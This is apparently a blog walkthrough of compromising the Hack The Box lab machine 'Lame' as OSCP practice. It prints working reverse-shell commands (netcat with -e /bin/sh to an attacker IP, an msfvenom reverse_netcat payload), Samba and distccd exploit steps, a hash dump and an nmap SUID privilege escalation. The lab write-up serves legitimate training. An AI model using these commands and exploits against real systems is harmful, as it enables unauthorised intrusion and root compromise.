Follow along in my OSCP journey, this is my target 3 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to t follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.3I thought I might show what the output looks like for this machine in the scan/ folder
-rw-r--r-- 1 kali kali 5391 Nov 24 04:52 _commands.log
-rw-r--r-- 1 kali kali 1134 Nov 24 04:51 enum4linux.txt
-rw-r--r-- 1 kali kali 5115 Nov 24 04:52 _full_tcp_nmap.txt
-rw-r--r-- 1 kali kali 2880 Nov 24 04:51 _manual_commands.txt
-rw-r--r-- 1 kali kali 131 Nov 24 04:53 _patterns.log
-rw-r--r-- 1 kali kali 3502 Nov 24 04:51 _quick_tcp_nmap.txt
-rw-r--r-- 1 kali kali 63 Nov 24 04:51 smbclient.txt
-rw-r--r-- 1 kali kali 518 Nov 24 04:51 smbmap-execute-command.txt
-rw-r--r-- 1 kali kali 3602 Nov 24 04:51 smbmap-list-contents.txt
-rw-r--r-- 1 kali kali 2186 Nov 24 04:51 smbmap-share-permissions.txt
-rw-r--r-- 1 kali kali 7385 Nov 24 04:59 tcp_139_smb_nmap.txt
-rw-r--r-- 1 kali kali 1265 Nov 24 04:51 tcp_21_ftp_nmap.txt
-rw-r--r-- 1 kali kali 2939 Nov 24 04:51 tcp_22_ssh_nmap.txt
-rw-r--r-- 1 kali kali 1549 Nov 24 04:53 tcp_3632_distcc_nmap.txt
-rw-r--r-- 1 kali kali 7385 Nov 24 04:58 tcp_445_smb_nmap.txt
-rw-r--r-- 1 kali kali 2208 Nov 24 04:58 _top_20_udp_nmap.txtSo you get nmap specific scripts at the bottom and then service specific scripts above. You can obviously refine the tool or use your own tools afterwards , it usually gives a really nice picture.
Nmap
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))We got an FTP server, SSH , SMB server and a Distccd service on this machine. Let’s explore each one of them. It seems that we might have multiple paths of entry.
FTP — 21
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
|_banner: 220 (vsFTPd 2.3.4)
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)We can see that anonymous access is enabled, let’s check it out.
To login we simply use the following credentials: anonymous/empty
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ ftp lame.htb [15/1761]
Connected to lame.htb.
220 (vsFTPd 2.3.4)
Name (lame.htb:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.After logging in, it seems that there is nothing we can do or get. The directory is empty and we can’t move from the folder.
ftp> pwd
257 "/"
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..Let’s check if the version is vulnerable. Using searchsploit
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption| exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)| exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)| exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rbThis is really good but we can’t use that exploit because we’re training for OSCP…
HINT
Are the exploits from exploit-db the only ones available?
.
.
.
.
We can look for one. Quick google search
https://github.com/ahervias77/vsftpd-2.3.4-exploit
We also get an example on how to use it
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ python3 vsftpd_234_exploit.py 10.10.10.3
21 id
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[!] Failed to connect to backdoor on 10.10.10.3:6200That didn’t work, let’s try another script
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ wget <https://gist.githubusercontent.com/thaisingle/e2af5a83f06dc91fdf60faa23f43ffec/raw/ba8505125ccd2f9ae30c56903f2e817aa96b1854/vsFtpdBackdoor.py>kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ python vsFtpdBackdoor.py 10.10.10.3 21
[*] Try to open port 6200
[*] Open Port 6200 completed
[!] Cannot get the shell
Let’s try manually. It seems that by providing a user and password to ftp it then opens a backdoor on 6200, let’s try to connect to it
kali@kali:~/Documents/HTB/lab$ telnet 10.10.10.3 21
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER qwertyuuu:)
331 Please specify the password.
PASS qweerrtt
421 Timeout.
Connection closed by foreign host.We then we try to connect to the backdoor with telnet and netcat they keep timing out.
nc 10.10.10.3 6200 -e /bin/bash
(UNKNOWN) [10.10.10.3] 6200 (?) : Connection timed outtelnet 10.10.10.3 6200
Trying 10.10.10.3...
telnet: Unable to connect to remote host: Connection timed out
BONUS HINT
What could stop the backdoor from working?
.
.
.
.
I first thought that this had been patched but after I got root with the other methods I checked what was up with this. By checking with netstat I could see tons of services running on the machine but not exposed.
root@lame:/# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:53728 0.0.0.0:* LISTEN 5604/rmiregistry
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:51814 0.0.0.0:* LISTEN 5335/rpc.mountd
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN 5563/jsvc
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 5614/unrealircd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 5158/mysqld
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN 5604/rmiregistry
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 5614/unrealircd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5413/smbd
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 5627/Xtightvnc
tcp 0 0 0.0.0.0:35407 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 4613/portmap
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 5627/Xtightvnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5583/apache2
tcp 0 0 0.0.0.0:56690 0.0.0.0:* LISTEN 4631/rpc.statd
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN 5608/ruby
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN 5563/jsvc
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN 5011/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 5011/named
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 5240/postgres
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 5403/master
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 5011/named
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5413/smbd This really seemed like there was a firewall in place, which I confirmed. We can see here that only these specific service which are the ones we saw on our scan where allowed
root@lame:/# iptables -L...
Chain ufw-user-input (1 references)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT udp -- anywhere anywhere udp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
ACCEPT tcp -- anywhere anywhere tcp dpt:distcc
ACCEPT udp -- anywhere anywhere udp dpt:distcc
ACCEPT tcp -- anywhere anywhere tcp dpt:netbios-ssn
ACCEPT udp -- anywhere anywhere udp dpt:netbios-ssn
ACCEPT tcp -- anywhere anywhere tcp dpt:microsoft-ds
ACCEPT udp -- anywhere anywhere udp dpt:microsoft-ds
...
Let’s try from an internal user to use the backdoor after triggering it, we now can see it in the netstat output!!
root@lame:/# netstat -tnlp | grep 6200
tcp 0 0 0.0.0.0:6200 0.0.0.0:* LISTEN 6605/vsftpdLet’s try to connect to to it as a user.
root@lame:/# su makis
sh-3.2$ id
uid=1003(makis) gid=1003(makis) groups=4(adm),112(admin),1003(makis)
sh-3.2$ bash
makis@lame:/$ nc localhost 6200
id
uid=0(root) gid=0(root)That was it, the software wasn’t patch, but we couldn’t reach the backdoor from the outside.
SSH — 22
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ passwordNothing interesting for SSH in searchsploit or online other than user enumeration.
SAMBA — 139/445
We get this output from our smbmap files, but the commands that worked are the following
smbmap -H 10.10.10.3 -P 139After that we added the -R parameter to list the content
smbmap -H 10.10.10.3 -P 139 -RFor all the different commands used to enumerate smb check the _commands.log file from autorecon and grep from smb.
Here is the full output from both files:
[+] IP: 10.10.10.3:445 Name: lame.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service
ADMIN$ NO ACCESS IPC Service.\tmp\*
dr--r--r-- 0 Tue Nov 24 04:56:37 2020 .
dw--w--w-- 0 Sat Oct 31 03:33:57 2020 ..
dr--r--r-- 0 Tue Nov 24 04:43:42 2020 .ICE-unix
dw--w--w-- 0 Tue Nov 24 04:44:15 2020 vmware-root
dr--r--r-- 0 Tue Nov 24 04:44:10 2020 .X11-unix
fw--w--w-- 11 Tue Nov 24 04:44:10 2020 .X0-lock
fw--w--w-- 0 Tue Nov 24 04:44:48 2020 5563.jsvc_up
fw--w--w-- 1600 Tue Nov 24 04:43:40 2020 vgauthsvclog.txt.0
.\tmp\.X11-unix\*
dr--r--r-- 0 Tue Nov 24 04:44:10 2020 .
dr--r--r-- 0 Tue Nov 24 04:56:37 2020 ..
fr--r--r-- 0 Tue Nov 24 04:44:10 2020 X0
Nothing that looks of much interest. On the other hand is seems that this version is vulnerable.
kali@kali:~/Documents/HTB/lab/10.10.10.3/scans$ searchsploit samba 3.0.20Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt
It seems that the only exploit shown is with metasploit, again this is a great opportunity to avoid using metasploit, let’s find one on the internet.
This looks really good but …
HINT
This won’t work straight away, check the code and find something that doesn’t look right.
.
.
.
.
We need to modify the shell script because the parameters aren’t correct.
Custom Exploit Time!
...# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f pythonbuf = ""
buf += "\\x6d\\x6b\\x66\\x69\\x66\\x6f\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x6b"
buf += "\\x62\\x67\\x61\\x66\\x3b\\x20\\x6e\\x63\\x20\\x31\\x30\\x2e\\x30"
buf += "\\x2e\\x30\\x2e\\x33\\x35\\x20\\x39\\x39\\x39\\x39\\x20\\x30\\x3c"
buf += "\\x2f\\x74\\x6d\\x70\\x2f\\x6b\\x62\\x67\\x61\\x66\\x20\\x7c\\x20"
buf += "\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x3e\\x2f\\x74\\x6d\\x70"
buf += "\\x2f\\x6b\\x62\\x67\\x61\\x66\\x20\\x32\\x3e\\x26\\x31\\x3b\\x20"
buf += "\\x72\\x6d\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x6b\\x62\\x67\\x61\\x66"
buf += "\\x20"...
Let’s create our own payload
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ msfvenom -p cmd/unix/reverse_netcat LHOST=attacker_ip LPORT=5555 -f pythonNo encoder specified, outputting raw payload
Payload size: 89 bytes
Final size of python file: 444 bytes
buf = b""
buf += b"\\x6d\\x6b\\x66\\x69\\x66\\x6f\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x6a"
buf += b"\\x75\\x6f\\x6b\\x3b\\x20\\x6e\\x63\\x20\\x31\\x30\\x2e\\x31\\x30"
buf += b"\\x2e\\x31\\x34\\x2e\\x34\\x36\\x20\\x35\\x35\\x35\\x35\\x20\\x30"
buf += b"\\x3c\\x2f\\x74\\x6d\\x70\\x2f\\x6a\\x75\\x6f\\x6b\\x20\\x7c\\x20"
buf += b"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x3e\\x2f\\x74\\x6d\\x70"
buf += b"\\x2f\\x6a\\x75\\x6f\\x6b\\x20\\x32\\x3e\\x26\\x31\\x3b\\x20\\x72"
buf += b"\\x6d\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x6a\\x75\\x6f\\x6b"
We modify the script with our own payload , set up a listener and let’s run it.
We had to install some dependencies for the script to run
pip install pysmbLet’s setup a listener
nc -nlvp 5555Now, we are good to run our script!
python samba-usermap-exploit.py lame.htblet’s go check our listener
kali@kali:~/Documents/HTB/lab$ nc -nlvp 5555 [2/2]
listening on [any] 5555 ...
connect to [attacker_ip] from (UNKNOWN) [10.10.10.3] 46428
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
id
uid=0(root) gid=0(root)
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/#LET’S GOO!! We get instant root.
Distccd — 3632
Quick google search to understand what this is.
distccd is the server for the distcc(1) distributed compiler. It accepts and runs compilation jobs for network clients.
PORT STATE SERVICE REASON VERSION
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| <https://distcc.github.io/security.html>
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687>
|_ <https://nvd.nist.gov/vuln/detail/CVE-2004-2687>Let’s look at possible exploits with searchsploit:
DistCC Daemon - Command Execution (Metasploit)| exploits/multiple/remote/9915.rbAgain, as true OSCP trainees we can’t use metasploit, let’s quickly google for that exploit.
https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ wget <https://gist.githubusercontent.com/D>
arkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/di
stccd_rce_CVE-2004-2687.pyThe creator explains how to use it
local>nc -lvp 1403
local>./disccd_exploit.py -t victim_IP -p 3632 -c "nc attacker_IP 1403 -e /bin/sh"We set up a listener
nc -nlvp 5555now, we can just run the exploit
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ python distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.46 5555 -e /bin/sh"
[OK] Connected to remote service
[KO] Socket TimeoutAnd … we get the shell!
kali@kali:~/Documents/HTB/lab/10.10.10.3$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.10.3] 50543
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)Time for some shell upgrade 😉
- python -c ‘import pty; pty.spawn(“/bin/bash”)’
- Ctrl+Z
- stty raw -echo
- fg (nothing will show on the screen, just type enter after the command a couple of times)
Let’s get the user flag
daemon@lame:/home/makis$ ls -la
total 28
drwxr-xr-x 2 makis makis 4096 Mar 14 2017 .
drwxr-xr-x 6 root root 4096 Mar 14 2017 ..
-rw------- 1 makis makis 1107 Mar 14 2017 .bash_history
-rw-r--r-- 1 makis makis 220 Mar 14 2017 .bash_logout
-rw-r--r-- 1 makis makis 2928 Mar 14 2017 .bashrc
-rw-r--r-- 1 makis makis 586 Mar 14 2017 .profile
-rw-r--r-- 1 makis makis 0 Mar 14 2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis 33 Nov 26 03:48 user.txt
daemon@lame:/home/makis$ cat user.txtNow we have an interactive shell and the user flag, let’s get root!
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)Nothing of interest unfortunately.
Enumeration scripts
This is where we upload our linpeas, LinEnum and Exploit Suggester.
On our attacking machine
We start by setting our Simple Python HTTP Server
sudo python -m SimpleHTTPServer 80
On the victim’s machine
We look for a writable folder, wget the scripts we want, give them the right permissions and finally execute them.
cd /tmp/
wget http://attacking_ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.shIt seems that nothing was outputted sometimes you need to execute it directly with bash
bash linpeash.sh --> that should workThere are a lot of interesting items in the linpeas output.
HINT
What seems to be the fastes way to get root out of the shiny things?
.
.
.
.
Let’s look at the items relevant in the scan
VNC
This seems juicy
root 5625 0.0 2.3 13924 12008 ? S 06:30 0:00 Xtightvnc :0 -desktop X -a
uth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/pass
wd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/
X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,
/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/sha
re/fonts/X11/100dpi/ -co /etc/X11/rgbBut we don’t have a simple way to expose the service externally because we don’t have credentials to perform any ssh tunneling. And additionally we don’t have a hint of the password so we would need to bruteforce it.
No pass for Mysql root user
Let’s check mysql for some juicy content
mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+It looks like these are databases belonging to other web security challenges because the content doesn’t seem to match our box.
mysql> use dvwa
use dvwa
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.00 sec)mysql> select * from users;
select * from users;
| id | first | last | user | password |
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99
SUID
This looks very promising, the nmap SUID is a classic
Regarding /usr/bin/at, we are the owner of at … can’t get much out of that.
daemon@lame:/var/www$ ls -la /usr/bin/at
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/atGTFOBins for nmap
/usr/bin/nmap --interactive
!shThis is GG!! Time for our loved screenshot confirmation.
sh-3.2# cat /root/root.txt
----------------------------
sh-3.2# ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:19:5f
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:195f/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:195f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1218 errors:0 dropped:0 overruns:0 frame:0
TX packets:729 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:261868 (255.7 KB) TX bytes:281052 (274.4 KB)
Interrupt:19 Base address:0x2024
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:391 errors:0 dropped:0 overruns:0 frame:0
TX packets:391 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:165697 (161.8 KB) TX bytes:165697 (161.8 KB)What did I learn?
- We learned why some backdoors might not comeback to us due to firewalls blocking them. But also that our reverse shells could get blocked by firewall. If a shell doesn’t pick upafter a couple of time start testing for other ports, usually the ones which are exposed.
- A very fast way to get root is check the program versions and look for exploits, the internet is filled with PoCs to exploit vulnerable software.
- We learned how to modify scripts by creating our own payloads with msfvenom. There is a lot more to explore with msfvenom but due to the leng of the walkthrough I kept it short. Check these 2 references for more information on how to create your own payloads for different situations: https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/ and https://netsec.ws/?p=331
- We learned about GTFOBins and how it can help you quickly exploit SUIDs.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.
